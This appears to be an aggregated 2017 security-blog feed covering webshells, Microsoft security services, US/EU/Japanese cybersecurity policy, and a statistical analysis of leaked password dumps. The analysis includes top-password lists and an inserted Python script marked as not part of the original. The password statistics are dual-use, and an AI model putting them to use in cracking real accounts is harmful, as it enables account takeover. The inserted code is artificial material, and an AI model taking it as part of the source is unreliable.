Tuesday, May 30, 2017
Tonight, I was invited by the OWASP Belgium Chapter (thank you again!) to present "something". When I accepted the invitation, I did not really have an idea, so I decided to compile the findings of my research about webshells. They are common tools used by bad guys: once they have compromised a server, they often install a webshell, which is a kind of toolbox or a RAT ("Remote Access Tool"). It is very interesting to analyze how such interfaces are protected from unauthorized access, but also the mistakes that are present in their code. This is a very first version and more will come soon!
My slides are available on slideshare.net:
Wednesday, May 24, 2017
Every company has cybersecurity risks and needs to be aware of them, but understanding your company’s risk profile is just the beginning.
Watch this Modern Workplace episode "Cyber Intelligence: Help Prevent a Breach" to get advice on how to best approach cybersecurity at your company from two Chief Information Security Officers (CISOs): Vanessa Pegueros, CISO at DocuSign, and Mike Convertino, CISO at F5 Networks. Learn how these seasoned security executives make decisions on security spending and how they justify security investments to skeptical executives who may never have experienced a security breach.
Knowing what you need to protect is a key component of your security strategy. As Convertino explains, “The value proposition of the company needs to be the thing that you base your protections and recommendations on.” When you have a clear goal for security, it becomes easier to demonstrate the value of your security investments in tools and talent.
You’ll also see a preview of the protection available from Office 365 Threat Intelligence, which lets you monitor and protect against risks before they hit your organization. Using Microsoft’s global presence to provide insight into real-time security threats, Office 365 Threat Intelligence enables you to quickly and effectively set up alerts, dynamic policies, and security solutions for potential threats.
Watch the Modern Workplace episode to learn more.
from Microsoft Secure Blog Staff
Monday, May 22, 2017
Would you know what to do if you drew the attention of a hacktivist group? Knowing that damages from a hacktivist attack are typically minor is no relief, as a breach will surely damage your reputation. However, knowing about the different types of hackers, what motivates them, and the tools and techniques they use, can help better prepare your organization to protect against them.
Attacks on organizations around the world are on the rise. Millions of dollars of intellectual property are at risk, as well as the threat of lost productivity. Threats now come from a wide range of sources including:
- Script Kiddies who exploit existing code to hack for fun
- Hacking Groups that work together to attack governments and companies
- Hacktivists who use hacking skills to promote an agenda
- Black Hat Professionals who make a living from hacking
- Organized Criminal Gangs that steal data to make money
- Nation States that do political and economic espionage
- Cyberweapons Dealers who sell exploits to other hackers
Learn more about the 7 different hackers and get recommendations on how you can better prepare your organization against their potential threats in this free eBook: 7 Types of Highly Effective Hackers.
from Microsoft Secure Blog Staff
Launceston is known for innovation and is now overseeing the establishment of a cyber security hub in the city. The lead discussion of the proposal took place on Monday during a council meeting.
Alderman Darren Alexander spoke to the council saying that they should be taking advantage of the cyber security growth network set by the federal government of Australia.
The establishment of a growth center is going to play a key role in the government’s $1.1 billion national innovation and science agenda recently announced.
The government will be allocating $31.9 million to fund the growth center till 2020.
The post Launceston will now support cyber security innovation appeared first on Cyber Security Portal.
from Gilbertine Onfroi
Friday, May 19, 2017
There was a lot of buzz about the leak of two huge databases of passwords a few days ago. This has been reported by Troy Hunt on his blog. The two databases are called "Anti-Trust-Combo-List" and "Exploit.In". Even if the sources of the leaks are not officially known, there are some ways to discover some of them (see my previous article about the "+" feature offered by Google).
A few days after the first leak, a second version of “Exploit.In” was released with even more passwords:
With the huge amount of passwords released in the wild, you can assume that your password is also included. But what are those passwords? I used Robin Wood's tool pipal to analyze them.
I decided to analyze the Anti-Trust-Combo-List, but I had to restart several times due to a lack of resources (pipal requires a lot of memory to generate the statistics) and it always failed. I therefore used a sample of the passwords and successfully analyzed 91M of them. The results generated by pipal are available below.
What can we deduce? Weak passwords remain classic. Most passwords have only 8 characters and are based on lowercase characters. Interesting fact: users like to “increase” the complexity of the password by adding trailing numbers:
- Just one number (due to the fact that they have to change it regularly and just increase it at every expiration)
- By adding their birth year
- By adding the current year
Basic Results
Total entries = 91178452
Total unique entries = 40958257

Top 20 passwords
123456 = 559283 (0.61%) | 123456789 = 203554 (0.22%) | passer2009 = 186798 (0.2%) | abc123 = 100158 (0.11%) | password = 96731 (0.11%)
password1 = 84124 (0.09%) | 12345678 = 80534 (0.09%) | 12345 = 76051 (0.08%) | homelesspa = 74418 (0.08%) | 1234567 = 68161 (0.07%)
111111 = 66460 (0.07%) | qwerty = 63957 (0.07%) | 1234567890 = 58651 (0.06%) | 123123 = 52272 (0.06%) | iloveyou = 51664 (0.06%)
000000 = 49783 (0.05%) | 1234 = 35583 (0.04%) | 123456a = 34675 (0.04%) | monkey = 32926 (0.04%) | dragon = 29902 (0.03%)

Top 20 base words
password = 273853 (0.3%) | passer = 208434 (0.23%) | qwerty = 163356 (0.18%) | love = 161514 (0.18%) | july = 148833 (0.16%)
march = 144519 (0.16%) | phone = 122229 (0.13%) | shark = 121618 (0.13%) | lunch = 119449 (0.13%) | pole = 119240 (0.13%)
table = 119215 (0.13%) | glass = 119164 (0.13%) | frame = 118830 (0.13%) | iloveyou = 118447 (0.13%) | angel = 101049 (0.11%)
alex = 98135 (0.11%) | monkey = 97850 (0.11%) | myspace = 90841 (0.1%) | michael = 88258 (0.1%) | mike = 82412 (0.09%)

Password length (length ordered)
1 = 54418 (0.06%) | 2 = 49550 (0.05%) | 3 = 247263 (0.27%) | 4 = 1046032 (1.15%) | 5 = 1842546 (2.02%) | 6 = 15660408 (17.18%) | 7 = 14326554 (15.71%) | 8 = 25586920 (28.06%)
9 = 12250247 (13.44%) | 10 = 11895989 (13.05%) | 11 = 2604066 (2.86%) | 12 = 1788770 (1.96%) | 13 = 1014515 (1.11%) | 14 = 709778 (0.78%) | 15 = 846485 (0.93%) | 16 = 475022 (0.52%)
17 = 157311 (0.17%) | 18 = 136428 (0.15%) | 19 = 83420 (0.09%) | 20 = 93576 (0.1%) | 21 = 46885 (0.05%) | 22 = 42648 (0.05%) | 23 = 31118 (0.03%) | 24 = 29999 (0.03%)
25 = 25956 (0.03%) | 26 = 14798 (0.02%) | 27 = 10285 (0.01%) | 28 = 10245 (0.01%) | 29 = 7895 (0.01%) | 30 = 12573 (0.01%) | 31 = 4168 (0.0%) | 32 = 66017 (0.07%)
33 = 1887 (0.0%) | 34 = 1422 (0.0%) | 35 = 1017 (0.0%) | 36 = 469 (0.0%) | 37 = 250 (0.0%) | 38 = 231 (0.0%) | 39 = 116 (0.0%) | 40 = 435 (0.0%)
41 = 45 (0.0%) | 42 = 57 (0.0%) | 43 = 14 (0.0%) | 44 = 47 (0.0%) | 45 = 5 (0.0%) | 46 = 13 (0.0%) | 47 = 1 (0.0%) | 48 = 16 (0.0%)
49 = 14 (0.0%) | 50 = 21 (0.0%) | 51 = 2 (0.0%) | 52 = 1 (0.0%) | 53 = 2 (0.0%) | 54 = 22 (0.0%) | 55 = 1 (0.0%) | 56 = 3 (0.0%)
57 = 1 (0.0%) | 58 = 2 (0.0%) | 60 = 10 (0.0%) | 61 = 3 (0.0%) | 63 = 3 (0.0%) | 64 = 1 (0.0%) | 65 = 2 (0.0%) | 66 = 9 (0.0%)
67 = 2 (0.0%) | 68 = 2 (0.0%) | 69 = 1 (0.0%) | 70 = 1 (0.0%) | 71 = 3 (0.0%) | 72 = 1 (0.0%) | 73 = 1 (0.0%) | 74 = 1 (0.0%)
76 = 2 (0.0%) | 77 = 1 (0.0%) | 78 = 1 (0.0%) | 79 = 3 (0.0%) | 81 = 3 (0.0%) | 83 = 1 (0.0%) | 85 = 1 (0.0%) | 86 = 1 (0.0%)
88 = 1 (0.0%) | 89 = 1 (0.0%) | 90 = 6 (0.0%) | 92 = 3 (0.0%) | 93 = 1 (0.0%) | 95 = 1 (0.0%) | 96 = 16 (0.0%) | 97 = 1 (0.0%)
98 = 3 (0.0%) | 99 = 2 (0.0%) | 100 = 1 (0.0%) | 104 = 1 (0.0%) | 107 = 1 (0.0%) | 108 = 1 (0.0%) | 109 = 1 (0.0%) | 111 = 2 (0.0%)
114 = 1 (0.0%) | 119 = 1 (0.0%) | 128 = 377 (0.0%)

Password length (count ordered)
8 = 25586920 (28.06%) | 6 = 15660408 (17.18%) | 7 = 14326554 (15.71%) | 9 = 12250247 (13.44%) | 10 = 11895989 (13.05%) | 11 = 2604066 (2.86%) | 5 = 1842546 (2.02%) | 12 = 1788770 (1.96%)
4 = 1046032 (1.15%) | 13 = 1014515 (1.11%) | 15 = 846485 (0.93%) | 14 = 709778 (0.78%) | 16 = 475022 (0.52%) | 3 = 247263 (0.27%) | 17 = 157311 (0.17%) | 18 = 136428 (0.15%)
20 = 93576 (0.1%) | 19 = 83420 (0.09%) | 32 = 66017 (0.07%) | 1 = 54418 (0.06%) | 2 = 49550 (0.05%) | 21 = 46885 (0.05%) | 22 = 42648 (0.05%) | 23 = 31118 (0.03%)
24 = 29999 (0.03%) | 25 = 25956 (0.03%) | 26 = 14798 (0.02%) | 30 = 12573 (0.01%) | 27 = 10285 (0.01%) | 28 = 10245 (0.01%) | 29 = 7895 (0.01%) | 31 = 4168 (0.0%)
33 = 1887 (0.0%) | 34 = 1422 (0.0%) | 35 = 1017 (0.0%) | 36 = 469 (0.0%) | 40 = 435 (0.0%) | 128 = 377 (0.0%) | 37 = 250 (0.0%) | 38 = 231 (0.0%)
39 = 116 (0.0%) | 42 = 57 (0.0%) | 44 = 47 (0.0%) | 41 = 45 (0.0%) | 54 = 22 (0.0%) | 50 = 21 (0.0%) | 48 = 16 (0.0%) | 96 = 16 (0.0%)
49 = 14 (0.0%) | 43 = 14 (0.0%) | 46 = 13 (0.0%) | 60 = 10 (0.0%) | 66 = 9 (0.0%) | 90 = 6 (0.0%) | 45 = 5 (0.0%) | 71 = 3 (0.0%)
56 = 3 (0.0%) | 92 = 3 (0.0%) | 79 = 3 (0.0%) | 98 = 3 (0.0%) | 63 = 3 (0.0%) | 61 = 3 (0.0%) | 81 = 3 (0.0%) | 51 = 2 (0.0%)
58 = 2 (0.0%) | 65 = 2 (0.0%) | 53 = 2 (0.0%) | 67 = 2 (0.0%) | 68 = 2 (0.0%) | 76 = 2 (0.0%) | 111 = 2 (0.0%) | 99 = 2 (0.0%)
73 = 1 (0.0%) | 72 = 1 (0.0%) | 74 = 1 (0.0%) | 70 = 1 (0.0%) | 69 = 1 (0.0%) | 77 = 1 (0.0%) | 78 = 1 (0.0%) | 64 = 1 (0.0%)
109 = 1 (0.0%) | 114 = 1 (0.0%) | 119 = 1 (0.0%) | 83 = 1 (0.0%) | 107 = 1 (0.0%) | 85 = 1 (0.0%) | 86 = 1 (0.0%) | 104 = 1 (0.0%)
88 = 1 (0.0%) | 89 = 1 (0.0%) | 57 = 1 (0.0%) | 100 = 1 (0.0%) | 55 = 1 (0.0%) | 93 = 1 (0.0%) | 52 = 1 (0.0%) | 95 = 1 (0.0%)
47 = 1 (0.0%) | 97 = 1 (0.0%) | 108 = 1 (0.0%)

[pipal length histogram omitted]

One to six characters = 18900217 (20.73%)
One to eight characters = 58813691 (64.5%)
More than eight characters = 32364762 (35.5%)
Only lowercase alpha = 25300978 (27.75%)
Only uppercase alpha = 468686 (0.51%)
Only alpha = 25769664 (28.26%)
Only numeric = 9526597 (10.45%)
First capital last symbol = 72550 (0.08%)
First capital last number = 2427417 (2.66%)
Single digit on the end = 13167140 (14.44%)
Two digits on the end = 14225600 (15.6%)
Three digits on the end = 6155272 (6.75%)

Last number
0 = 4370023 (4.79%) | 1 = 12711477 (13.94%) | 2 = 5661520 (6.21%) | 3 = 6642438 (7.29%) | 4 = 3951994 (4.33%)
5 = 4028739 (4.42%) | 6 = 4295485 (4.71%) | 7 = 4055751 (4.45%) | 8 = 3596305 (3.94%) | 9 = 4240044 (4.65%)

[pipal last-digit histogram omitted]

Last digit
1 = 12711477 (13.94%) | 3 = 6642438 (7.29%) | 2 = 5661520 (6.21%) | 0 = 4370023 (4.79%) | 6 = 4295485 (4.71%)
9 = 4240044 (4.65%) | 7 = 4055751 (4.45%) | 5 = 4028739 (4.42%) | 4 = 3951994 (4.33%) | 8 = 3596305 (3.94%)

Last 2 digits (Top 20)
23 = 2831841 (3.11%) | 12 = 1570044 (1.72%) | 11 = 1325293 (1.45%) | 01 = 1036629 (1.14%) | 56 = 1013453 (1.11%)
10 = 909480 (1.0%) | 00 = 897526 (0.98%) | 13 = 854165 (0.94%) | 09 = 814370 (0.89%) | 21 = 812093 (0.89%)
22 = 709996 (0.78%) | 89 = 706074 (0.77%) | 07 = 675624 (0.74%) | 34 = 627901 (0.69%) | 08 = 626722 (0.69%)
69 = 572897 (0.63%) | 88 = 557667 (0.61%) | 77 = 557429 (0.61%) | 14 = 539236 (0.59%) | 45 = 530671 (0.58%)

Last 3 digits (Top 20)
123 = 2221895 (2.44%) | 456 = 807267 (0.89%) | 234 = 434714 (0.48%) | 009 = 326602 (0.36%) | 789 = 318622 (0.35%)
000 = 316149 (0.35%) | 345 = 295463 (0.32%) | 111 = 263894 (0.29%) | 101 = 225151 (0.25%) | 007 = 222062 (0.24%)
321 = 221598 (0.24%) | 666 = 201995 (0.22%) | 010 = 192798 (0.21%) | 777 = 164454 (0.18%) | 011 = 141015 (0.15%)
001 = 138363 (0.15%) | 008 = 137610 (0.15%) | 999 = 129483 (0.14%) | 987 = 126046 (0.14%) | 678 = 123301 (0.14%)

Last 4 digits (Top 20)
3456 = 727407 (0.8%) | 1234 = 398622 (0.44%) | 2009 = 298108 (0.33%) | 2345 = 269935 (0.3%) | 6789 = 258059 (0.28%)
1111 = 148964 (0.16%) | 2010 = 140684 (0.15%) | 2008 = 111014 (0.12%) | 2000 = 110456 (0.12%) | 0000 = 108767 (0.12%)
2011 = 103328 (0.11%) | 5678 = 102873 (0.11%) | 4567 = 94964 (0.1%) | 2007 = 94172 (0.1%) | 4321 = 92849 (0.1%)
3123 = 92104 (0.1%) | 1990 = 87828 (0.1%) | 1987 = 87142 (0.1%) | 2006 = 86640 (0.1%) | 1991 = 86574 (0.09%)

Last 5 digits (Top 20)
23456 = 721648 (0.79%) | 12345 = 261734 (0.29%) | 56789 = 252914 (0.28%) | 11111 = 116179 (0.13%) | 45678 = 96011 (0.11%)
34567 = 90262 (0.1%) | 23123 = 84654 (0.09%) | 00000 = 81056 (0.09%) | 54321 = 73623 (0.08%) | 67890 = 66301 (0.07%)
21212 = 28777 (0.03%) | 23321 = 28767 (0.03%) | 77777 = 28572 (0.03%) | 22222 = 27754 (0.03%) | 55555 = 26081 (0.03%)
66666 = 25872 (0.03%) | 56123 = 21354 (0.02%) | 88888 = 19025 (0.02%) | 99999 = 18288 (0.02%) | 12233 = 16677 (0.02%)

Character sets
loweralphanum: 47681569 (52.29%) | loweralpha: 25300978 (27.75%) | numeric: 9526597 (10.45%) | mixedalphanum: 3075964 (3.37%) | loweralphaspecial: 1721507 (1.89%)
loweralphaspecialnum: 1167596 (1.28%) | mixedalpha: 981987 (1.08%) | upperalphanum: 652292 (0.72%) | upperalpha: 468686 (0.51%) | mixedalphaspecialnum: 187283 (0.21%)
specialnum: 81096 (0.09%) | mixedalphaspecial: 53882 (0.06%) | upperalphaspecialnum: 39668 (0.04%) | upperalphaspecial: 18674 (0.02%) | special: 14657 (0.02%)

Character set ordering
stringdigit: 41059315 (45.03%) | allstring: 26751651 (29.34%) | alldigit: 9526597 (10.45%) | othermask: 4189226 (4.59%) | digitstring: 4075593 (4.47%)
stringdigitstring: 2802490 (3.07%) | stringspecial: 792852 (0.87%) | digitstringdigit: 716311 (0.79%) | stringspecialstring: 701378 (0.77%) | stringspecialdigit: 474579 (0.52%)
specialstring: 45323 (0.05%) | specialstringspecial: 28480 (0.03%) | allspecial: 14657 (0.02%)
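As an added illustration (not part of the original post and not pipal's own code), here is a small pipal-style pass over a password list that measures the trailing-number habits described above: a single digit bumped at each expiry, a birth year, or the current year. The password sample and the year thresholds are constructed assumptions.

```python
"""pipal-style statistics for a password list, focused on trailing digits.
The sample passwords are constructed; CURRENT_YEAR and BIRTH_YEARS are
assumptions chosen to match the post (written in 2017)."""
import re
from collections import Counter

CURRENT_YEAR = 2017                   # year of the post
BIRTH_YEARS = range(1940, 2000)       # assumed plausible birth-year range

# Constructed sample; "123456" appears twice to show total vs unique counts.
SAMPLE_PASSWORDS = [
    "123456", "password", "password1", "passer2009", "summer2017",
    "monkey1987", "Welcome2", "qwerty", "dragon", "iloveyou123",
    "P@ssw0rd!", "ABCDEF", "alex1991", "shark", "table12", "123456",
]


def charset(pw: str) -> str:
    """pipal-style character-set label (loweralphanum, mixedalpha, ...)."""
    lower = any(c.islower() for c in pw)
    upper = any(c.isupper() for c in pw)
    digit = any(c.isdigit() for c in pw)
    special = any(not c.isalnum() for c in pw)
    if digit and not (lower or upper or special):
        return "numeric"
    prefix = "mixed" if lower and upper else "lower" if lower else "upper"
    label = (prefix + "alpha") if (lower or upper) else ""
    label += "special" if special else ""
    label += "num" if digit else ""
    return label


def trailing_digits(pw: str) -> str:
    """The run of digits at the end of the password ('' if none)."""
    m = re.search(r"\d+$", pw)
    return m.group(0) if m else ""


def year_kind(digits: str):
    """Classify a trailing run of 4+ digits by its last four digits."""
    if len(digits) < 4:
        return None
    year = int(digits[-4:])
    if year == CURRENT_YEAR:
        return "current_year"
    if year in BIRTH_YEARS:
        return "birth_year"
    if 1900 <= year <= CURRENT_YEAR:
        return "other_year"      # e.g. the year the password was set
    return None


def analyze(passwords):
    """Counts in the spirit of pipal's length, charset and last-digit sections."""
    stats = {"total": len(passwords), "unique": len(set(passwords)),
             "top": Counter(passwords).most_common(5),
             "lengths": Counter(len(p) for p in passwords),
             "charsets": Counter(charset(p) for p in passwords),
             "trailing": Counter(), "years": Counter()}
    for pw in passwords:
        run = trailing_digits(pw)
        if run:
            stats["trailing"][str(len(run)) if len(run) < 4 else "4+"] += 1
        kind = year_kind(run)
        if kind:
            stats["years"][kind] += 1
    return stats


def pct(n: int, total: int) -> str:
    return f"{n} ({100.0 * n / total:.2f}%)"


def report(stats) -> str:
    """Render the statistics in pipal's 'key = count (pct%)' style."""
    t = stats["total"]
    lines = [f"Total entries = {t}", f"Total unique entries = {stats['unique']}", ""]
    for title, counter in (("Password length", stats["lengths"]),
                           ("Character sets", stats["charsets"]),
                           ("Digits on the end", stats["trailing"]),
                           ("Trailing year", stats["years"])):
        lines.append(title)
        for key, n in sorted(counter.items(), key=lambda kv: -kv[1]):
            lines.append(f"  {key} = {pct(n, t)}")
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(analyze(SAMPLE_PASSWORDS)))
```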
[The post Your Password is Already In the Wild, You Did not Know? has been first published on /dev/random]
Thursday, May 18, 2017
I published the following diary on isc.sans.org: “My Little CVE Bot“.
The massive spread of the WannaCry ransomware last Friday was another good proof that many organisations still fail to patch their systems. Everybody admits that patching is a boring task. There are many constraints that make this process very difficult to implement and… apply! That's why any help is welcome to know what to patch and when… [Read more]
Wednesday, May 17, 2017
The recent revision of the National Institute of Standards and Technology's (NIST) Cybersecurity Framework and the publication of the European Network and Security Agency's (ENISA) proposals on implementation of the Network and Information Security (NIS) Directive have made me pause and ponder the progress made (or indeed not) in securing our critical infrastructures since they were both introduced. I was also struck by how much the differences in political culture affect policy outcomes, even when these are largely supported by the broad ecosystems they seek to regulate and/or influence.
The starting point was strikingly similar for both economic powers: the Directive and the Framework seek to improve cybersecurity of critical infrastructures. They came out at around the same time in early 2013, when the European Commission first introduced the Directive and when Obama signed the Executive Order that set out the process that ultimately resulted in the Cybersecurity Framework.
Given the considerable differences in the US and the EU political, legislative and executive “machines” it is no surprise that, even with these common starting points, the two have followed very different paths. The Framework is undergoing its first major revision in 3 years based on changes in threat and experiences of global adopters. The Directive is now only beginning the implementation phase in the EU member states.
The NIST’s creation of the Framework has been rightly held up as a successful example of public-private partnership. It used an open, collaborative and iterative development process to harness the expertise and experience of cyber and non-cyber stakeholders, hosting numerous open workshops and consulting widely, and not just within the US itself. The result was a Framework that is now being referenced around the world, by businesses and governments and it is being considered as a starting point for ISO 27103.
On the other hand, the processes of aligning 28 different sets of national cybersecurity agendas, and of securing a common view from a European Parliament that has somewhere between four and six major party groups, took considerably longer than the gestation of the Framework. It was a monumental effort and investment on the part of Europe. There were working groups and workshops too, but perhaps because of the efforts to coordinate the necessary agreements at the "top", the resulting Directive lacked some of the obvious "bottom-up" characteristics of the Framework. But the Directive has the benefit of creating durable institutions in EU member states, coordination processes, and security baselines. As a result, it is likely to produce a very different return on investment than the Framework.
But this should not just be a story of different approaches to cybersecurity policy. The EU approach to building institutions and setting capabilities requirements, if implemented and evolved, will help provide a layer of coordination and security that did not exist. The Framework’s voluntary nature and global adoption is better at preparing enterprises – public and private – for improving risk management measures.
These are substantial differences, from the perspective of both businesses and regulators in these two approaches. However, in the end they may complement each other more than we see today. For example, several EU member states already reference the Framework within their approaches to cybersecurity as they seek to leverage implementing terminology and standards. Looking forward, therefore, it is possible that the two approaches could converge in practical ways. Parts of the Framework might evolve into an international standard, as referenced above, one that can be utilized by a great number of countries. Equally, the implementation of the Directive at EU member state level, and the identification of reference standards, could establish a model that other regions might follow.
Cybercriminals and cyberattacks will inevitably be encouraged and enabled by serious divergence in approaches to cybersecurity, wherever in the world these occur. As such, it seems essential that steps are taken on both sides of the Atlantic to ensure closer harmonization, both to improve the situation of the US and the EU and to set an example to the rest of the world.
from Paul Nicholas
Tuesday, May 16, 2017
This post is authored by Berk Veral, Senior Marketing Communication Manager, Enterprise Cybersecurity Group.
Perhaps one of the best-kept secrets within Microsoft cybersecurity services is the Global Incident Response and Recovery team. We affectionately call them the “GIRR” team for short. Not many people know about the team but, for those whom they have helped to combat cyber criminals, they are indispensable – a trusted partner when the worst cybercrimes happen.
The GIRR team is comprised of elite cybersecurity professionals who are experts in handling critical incidents and helping our customers during a crisis when a compromise or a breach is suspected. On an ongoing basis, the team works around the clock and around the globe, demonstrating grit, fortitude and steadfast dedication to Microsoft customers in need.
The team is expanding and now offers two new services for our customers: Persistent Adversary Detection Services – Cloud Enabled (PADS-CE) and Compromise Recovery (CR). These are two very different standalone services designed to help customers under specific circumstances.
Cloud-Based Persistent Adversary Detection Service
PADS-CE is a cybersecurity service for customers who want to understand their exposure to the risks posed by today’s targeted attacks from determined human adversaries and sophisticated criminal organizations. However, unlike a traditional PADS engagement where all resources would be deployed onsite at the customer’s location, PADS-CE leverages a secure Azure workspace for collaboration, allowing remote team members to participate in the engagement. PADS-CE provides the ability to leverage the unique skill sets of seasoned Incident Responders worldwide, culminating in a richer engagement experience and output for our customers.
PADS-CE is ideal for enterprise customers primarily running Windows endpoints who would like to validate that they have not been the victim of a targeted attack. It is a proactive, discreet service that is, in effect, an incident response prior to an actual emergency.
Microsoft will provide information regarding the customer’s exposure to targeted attacks via PADS-CE at a lower price point by leveraging Azure and a team of remote resources. PADS-CE leverages telemetry from Microsoft’s vast, global sensor network, and is able to correlate PADS-CE findings against threat intelligence worldwide. The team leverages proprietary scanners (that do not remain on the network), to detect the presence of implants, backdoors, and similar unauthorized malc0de. Through forensic analysis and reverse engineering of any implants found, the team can assess customers’ current exposure to the threats posed by targeted attacks.
Microsoft Compromise Recovery (CR) service is a cybersecurity offering designed to restore a customer’s secure business operations after a compromise. The service runs in parallel with any ongoing incident response investigation or soon after its completion, whether performed by Microsoft or a 3rd party.
It consists of four principal components:
- Scoping of the compromise
- Installing critical hardening policies
- Deploying and tuning tactical monitoring solutions
- Coordinating an attacker eviction event
CR is ideal for enterprise customers primarily running Windows endpoints who have confirmed malicious activity in their environment. Most likely, they have already engaged Microsoft or a 3rd party to complete an incident response investigation.
CR will help customers get their business operations back up and running by remediating their exposure to risks after an incident response investigation. CR will remove identified malicious activity from their network, harden against further compromise and monitor for indicators of compromise based on the current attack.
In addition to restoring a customer’s secure business operations and providing information regarding the customer’s remaining risk exposure, CR will offer suggestions for strategic initiatives to improve security posture. Microsoft leverages best in class monitoring solutions – Advanced Threat Analytics (ATA) and Operations Management Suite (OMS) – to monitor systems after a compromise. Compromise Recovery is based on years of industry expertise and best practices with incident response, based on the Microsoft GIRR team successfully leading countless recoveries around the globe.
Trusted Security Partner Every Step of the Way
These two offerings bring Microsoft customers expanded capabilities in cybersecurity, and provide the Microsoft Global Incident Response and Recovery team another tool to ensure Microsoft can be counted on by every enterprise CISO as their trusted security partner when it comes to detecting and responding to incidents, as well as getting business operations back up and running in the wake of an incident.
Please visit Sharing Microsoft learnings from major cybersecurity incidents to learn more about the Microsoft Global Incident Response and Recovery team and how they can help your organization.
from Microsoft Secure Blog Staff
Monday, May 15, 2017
This post is authored by Angela McKay, Director of Cybersecurity Policy.
Earlier this year, my team and I had the great privilege and pleasure of spending several days in Japan, participating in the Information Technology Promotion Agency (IPA) Symposium. We also met with industry colleagues to discuss global cybersecurity trends and opportunities to engage in public policy, and met with Japanese government partners to examine the question of cloud security.
Even just a few days in Tokyo demonstrated that the focus on the importance of cybersecurity is growing in Japan and across the Asia-Pacific region, within both government and industry. The understanding that concrete action is now needed is also growing.
Japan is well positioned for regional leadership in this space. The size of the IPA symposium, the seniority of both attendees and speakers, and the maturity of the conversation underscored this. In Japan, cybersecurity is clearly evolving from an issue of interest solely to technically inclined geeks, to one that is a major concern for the government, businesses, and consumers. The policy debate is shifting from conceptual discussions to more practical consideration, such as the development of security practices and requirements, particularly for critical infrastructure and government.
What is particularly praise-worthy and unique in the Japanese approach, is the iterative way the government is tackling challenges in this space, dynamically reprioritizing and emphasizing different areas based on changes in technology and risks, and the effectiveness of its various efforts. For example, while the Basic Cybersecurity Law and National Cybersecurity Strategy were adopted more than two years ago, the government has since repeatedly consulted and reexamined areas where outcomes have proven to be difficult to attain, for example cross-government cooperation on cybersecurity.
Japan is not alone in grappling with how to govern cybersecurity; however, it is one of the few governments which understands that cybersecurity is not an area that can be looked at once and then ignored for the next decade. It is using the impetus behind the 2020 Olympics and Paralympics to increase cyber resilience, examining how new technologies, such as cloud computing, can increase security of the government, critical infrastructures, and for the Internet of Things (IoT). It actively seeks to assess progress with 2020 in mind, for example by considering whether and how cybersecurity information sharing is increasing the security of the Games and key sectors of the economy. It does this not just through forming ISACs but by partnering with the private sector to ensure that 1) sharing is focused on risk management outcomes and 2) cultural and structural obstacles that might be particular to Japan are understood and addressed.
A similar approach is being pursued when it comes to encouraging critical infrastructure sectors to adopt risk management practices. The government has been consulting on its guide, as they are realizing that while the voluntary nature of their cybersecurity efforts remains pivotal, many of the private sector enterprises are looking for more specific guidance on how to move forward in this area. In our response, Microsoft therefore suggested developing a model similar to the one put forward by NIST with its Cybersecurity Framework, where the government and private sector collaborated to develop guidance that built on proven standards and best practices within an overarching framework that is meaningful to executives.
Beyond this pragmatic approach, Japan also continues to drive thought leadership in important new areas. Japan recently announced a new partnership with Germany to establish an Internet of Things (IoT) standard for commercial and industrial organizations, as well as proposals on how to best secure this new area of innovation. This has given Japan a unique opportunity, perhaps even a responsibility as a genuine world leader in this space, to start articulating the security concerns that should be addressed by players in IoT services (with a link to our NTIA response for more detail). Their solutions, including the use of incentives to drive behaviors, will be looked at by other governments, not just regionally but across the globe.
In the era of digitalization, every government and organization should look to and incorporate and codify effective initiatives and programs, such as Japan’s, into their policies and operations. Microsoft is excited to work alongside Japan and other Asia-Pacific countries to build a global culture of strong cybersecurity principles that create a trustworthy high-tech world. It will require the leadership of countries such as Japan and the commitment of industry leaders such as ourselves to ensure the safety and security in the digital space.
from Microsoft Secure Blog Staff
Friday, May 12, 2017
I published the following diary on isc.sans.org: “When Bad Guys are Pwning Bad Guys…“.
A few months ago, I wrote a diary about webshells and the numerous interesting features they offer. There are plenty of web shells available, and they are easy to find and install. They are usually delivered as one big obfuscated (read: Base64, ROT13 encoded and gzip'd) PHP file that can simply be dropped on a compromised computer. Some of them look nice and professional, like the RC-Shell… [Read more]
Thursday, May 11, 2017
Cybercrime has existed in one form or another for decades, but the threat it poses today is unlike anything we have seen in the past. With attackers now increasing in number and coming from different regions of the world with different intentions, organizations in the US and around the world are at a huge risk of an attack with unbearable consequences.
Broadcasting companies may not have been targeted regularly, but that doesn’t mean they are safe from the threats. Actually, they depend a lot on technology to help them broadcast their stream on radio and TV. To avoid becoming a victim, broadcasting companies should come together to fight cyber crime.
The post Why broadcasters should work together to prevent cyber crime appeared first on Cyber Security Portal.
from Gilbertine Onfroi
Wednesday, May 10, 2017
This post is authored by Roberto Bamberger, Principal Consultant, Enterprise Cybersecurity Group.
Amongst the plethora of stories about cyberattacks in the news, multiple recent articles have been published describing the more difficult to detect cyberattacks which leverage normal tools, already present in an enterprise, to achieve their mission. SecureList calls the techniques used in these situations “invisible” and “diskless”. This post describes the challenges your organization can face in detecting such attacks with typical detection techniques and what you can do to protect against them.
To begin, consider that many of these attacks use native capabilities in Microsoft Windows such as PowerShell in order to avoid having to store files on disks which are routinely scanned and could be discovered by antivirus products. That is why Microsoft has developed multiple capabilities that can detect such attacks including:
- Microsoft Enterprise Threat Detection
- Windows Defender Advanced Threat Protection
- Microsoft Advanced Threat Analytics
Here is a summary of why these can help you.
The Microsoft Enterprise Threat Detection (ETD) service is a managed detection service, able to detect invisible/diskless attacks and provide enterprises with actionable intelligence to effectively respond to these threats. Windows 10 also includes Windows Defender Advanced Threat Protection (Windows Defender ATP). This feature, along with the Antimalware Scan Interface (AMSI) and Microsoft Advanced Threat Analytics (ATA), provides you with user and entity behavioral analysis capabilities which can be effective in detecting such threats and their associated malicious behaviors.
Enterprise Threat Detection can consume a variety of data sources:
- Windows error reports can contain memory of a faulting process, registry keys, files, and the results of WMI queries
- Telemetry sent from the organization’s IP egress ranges in the form of the Microsoft Active Protection System (MAPS)
- Data received by the Microsoft Digital Crimes Unit as part of its botnet disruption and eradication efforts
- Signals monitored by ATA and Windows Defender ATP on Windows 10, which provide advanced detection and response data
To illustrate leveraging the Windows Error Reporting data for this type of advanced analysis, the Microsoft ETD team recently received an event from a customer environment, which was due to a crash in PowerShell.
In this case, PowerShell was executing an object stored in a base64-encoded string. Automated analysis of the memory of the PowerShell process indicated that it contained code consistent with malicious code, in the form of shellcode.
Further analysis revealed that the code, reflectively loaded into the PowerShell process, attempted to download additional code from an external source. Using advanced analysis tools, ETD analysts determined the name of the server and the file that was being requested.
